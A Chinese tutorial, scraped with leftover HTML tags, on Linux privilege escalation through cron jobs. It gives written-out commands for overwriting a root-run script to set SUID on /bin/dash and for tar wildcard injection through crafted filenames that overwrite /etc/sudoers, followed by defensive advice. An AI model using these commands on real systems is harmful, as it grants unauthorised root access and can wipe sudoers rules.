Linux提权技术：利用定时任务(Cronjobs)进行权限提升<\/h1>

1. Cronjobs基础概念<\/h2>

1.1 什么是Cronjobs<\/h3>

Cronjobs(定时任务)是Linux系统中用于安排周期性执行命令或脚本的工具。它由cron守护进程管理，会持续检查以下位置：<\/p>

\/etc\/crontab<\/code> 文件<\/li>
\/etc\/cron.*\/<\/code> 目录<\/li>

\/var\/spool\/cron\/<\/code> 目录<\/li>
<\/ul>
1.2 Cronjobs的基本格式<\/h3>
一个典型的cronjob条目格式如下：<\/p>
* * * * * user command-to-be-executed
<\/code><\/pre>
五个星号分别代表：<\/p>

分钟 (0-59)<\/li>
小时 (0-23)<\/li>
日 (1-31)<\/li>
月 (1-12)<\/li>
星期 (0-7，0和7都代表星期日)<\/li>
<\/ol>
2. 利用Cronjobs提权的两种方法<\/h2>
2.1 Crontab文件覆写提权<\/h3>
2.1.1 攻击场景<\/h4>
假设系统中存在一个每2分钟以root权限执行的Python脚本，用于清理特定目录。<\/p>
2.1.2 攻击步骤<\/h4>


识别可利用的Cronjob<\/strong>：<\/p>
cat \/etc\/crontab
<\/span><\/span>ls -al \/tmp\/cleanup.py
<\/span><\/span>cat \/tmp\/cleanup.py
<\/span><\/span><\/code><\/pre><\/li>

修改脚本内容<\/strong>：

如果对脚本有写入权限，可以修改cleanup.py<\/code>内容为：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> sys
<\/span><\/span>try<\/span>:
<\/span><\/span>    os.<\/span>system('chmod u+s \/bin\/dash'<\/span>)
<\/span><\/span>except<\/span>:
<\/span><\/span>    sys.<\/span>exit()
<\/span><\/span><\/code><\/pre><\/li>

等待执行<\/strong>：

等待cronjob执行（本例中为2分钟后），\/bin\/dash<\/code>将被设置SUID位。<\/p>
<\/li>

获取root权限<\/strong>：<\/p>
\/bin\/dash
<\/span><\/span>id
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.1.3 关键点<\/h4>

需要目标脚本有写入权限<\/li>
修改后的命令会以root权限执行<\/li>
设置SUID位是常见提权方法之一<\/li>
<\/ul>
2.2 Crontab Tar Wildcard注入提权<\/h3>
2.2.1 攻击场景<\/h4>
系统中存在一个每分钟以root权限执行的tar备份任务。<\/p>
2.2.2 攻击步骤<\/h4>


识别可利用的Cronjob<\/strong>：<\/p>
cat \/etc\/crontab
<\/span><\/span><\/code><\/pre>发现类似条目：<\/p>
*\/1 * * * * root tar -zcf \/var\/backups\/html.tgz \/var\/www\/html\/*
<\/code><\/pre>
<\/li>

准备恶意文件<\/strong>：<\/p>
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > \/etc\/sudoers'<\/span> > test.sh
<\/span><\/span>echo ""<\/span> > "--checkpoint-action=exec=sh test.sh"<\/span>
<\/span><\/span>echo ""<\/span> > --checkpoint=<\/span>1<\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发漏洞<\/strong>：<\/p>
tar cf archive.tar *
<\/span><\/span><\/code><\/pre><\/li>

等待执行<\/strong>：

1分钟后，当前用户将被添加到sudoers文件中，获得无密码sudo权限。<\/p>
<\/li>

获取root权限<\/strong>：<\/p>
sudo -l
<\/span><\/span>sudo bash
<\/span><\/span>whoami
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2.3 关键点<\/h4>

利用了tar命令的--checkpoint<\/code>和--checkpoint-action<\/code>参数<\/li>
通过文件名注入的方式执行恶意命令<\/li>
需要目标目录有写入权限<\/li>
最终通过修改sudoers文件实现提权<\/li>
<\/ul>
3. 防御措施<\/h2>
3.1 系统管理员防护建议<\/h3>


最小权限原则<\/strong>：<\/p>

Cronjob脚本和目录应严格限制写入权限<\/li>
避免使用root权限执行不必要的任务<\/li>
<\/ul>
<\/li>

审计与监控<\/strong>：<\/p>

定期检查\/etc\/crontab<\/code>和\/etc\/cron.*\/<\/code>目录<\/li>
监控异常的系统文件修改<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

使用chattr +i<\/code>保护关键脚本不被修改<\/li>
对cronjob执行的脚本进行完整性检查<\/li>
<\/ul>
<\/li>

更新与补丁<\/strong>：<\/p>

保持系统更新，修复已知漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
3.2 开发者注意事项<\/h3>


避免使用通配符<\/strong>：<\/p>

在cronjob命令中谨慎使用*<\/code>等通配符<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

对所有可能被cronjob处理的文件进行严格验证<\/li>
<\/ul>
<\/li>

日志记录<\/strong>：<\/p>

记录cronjob的执行情况和输出<\/li>
<\/ul>
<\/li>
<\/ol>
4. 总结<\/h2>
本文详细介绍了两种利用Linux定时任务(Cronjobs)进行权限提升的技术：<\/p>

Crontab文件覆写<\/strong>：通过修改以root权限执行的脚本内容实现提权<\/li>
Tar Wildcard注入<\/strong>：利用tar命令的参数特性注入恶意命令<\/li>
<\/ol>
这两种方法都利用了系统配置不当或权限设置不严格的问题。防御的关键在于遵循最小权限原则、严格控制系统文件的访问权限，并定期审计系统配置。<\/p>

Linux提权技术：利用定时任务(Cronjobs)进行权限提升<\/h1>

1. Cronjobs基础概念<\/h2>

2. 利用Cronjobs提权的两种方法<\/h2>

2.1 Crontab文件覆写提权<\/h3>

2.1.1 攻击场景<\/h4> 假设系统中存在一个每2分钟以root权限执行的Python脚本，用于清理特定目录。<\/p>

2.2 Crontab Tar Wildcard注入提权<\/h3>

2.2.1 攻击场景<\/h4> 系统中存在一个每分钟以root权限执行的tar备份任务。<\/p>

3. 防御措施<\/h2>

2.1.1 攻击场景<\/h4>
假设系统中存在一个每2分钟以root权限执行的Python脚本，用于清理特定目录。<\/p>

2.2.1 攻击场景<\/h4>
系统中存在一个每分钟以root权限执行的tar备份任务。<\/p>